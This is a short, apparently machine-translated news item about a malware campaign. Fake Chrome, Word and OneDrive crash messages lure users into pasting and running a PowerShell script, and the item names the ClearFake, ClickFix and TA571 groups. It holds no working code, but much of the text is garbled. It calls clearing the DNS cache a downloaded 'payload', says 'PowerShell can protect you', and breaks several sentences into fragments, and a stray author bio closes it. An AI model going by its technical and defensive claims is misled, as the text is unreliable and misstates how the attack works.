A new malware distribution campaign has been discovered that uses fake crash messages from Google Chrome, Word, and OneDrive to trick users into installing “fixes” that are actually malware.
The trick to installing is something like “Chrome, you're running slower. Try increasing the speed by installing this program.” Click “OK” and that's it.
This campaign has been found to be used by many hacker groups. Including the group behind ClearFake, a new group called ClickFix, and the infamous TA571 group. It is known to be an avid spreader of malware.
These messages trick users into pressing a button to copy the malicious “PowerShell script” to the clipboard. Then paste it and run it in the Run or PowerShell window, and this script will install the malware on the device.
A malicious PowerShell script is a set of commands written in PowerShell that are designed to perform malicious activities on a computer system or network. These scripts can perform a variety of tasks. From identity theft to installing malware to control the system remotely
When you execute a PowerShell script it will follow different steps. To ensure that the device is the correct target. It then downloads various payloads such as clearing the DNS cache.
Delete the contents of the clipboard. Show fraudulent messages and download other PowerShell scripts remotely
But PowerShell can protect you by: 1. Be careful when opening email attachments or clicking links from untrusted sources 2. Update your operating system to the latest version and install antivirus software.
Origin
com.bleepingcomputer
“Unapologetic communicator. Wannabe web lover. Friendly travel scholar. Problem solver. Amateur social mediaholic.”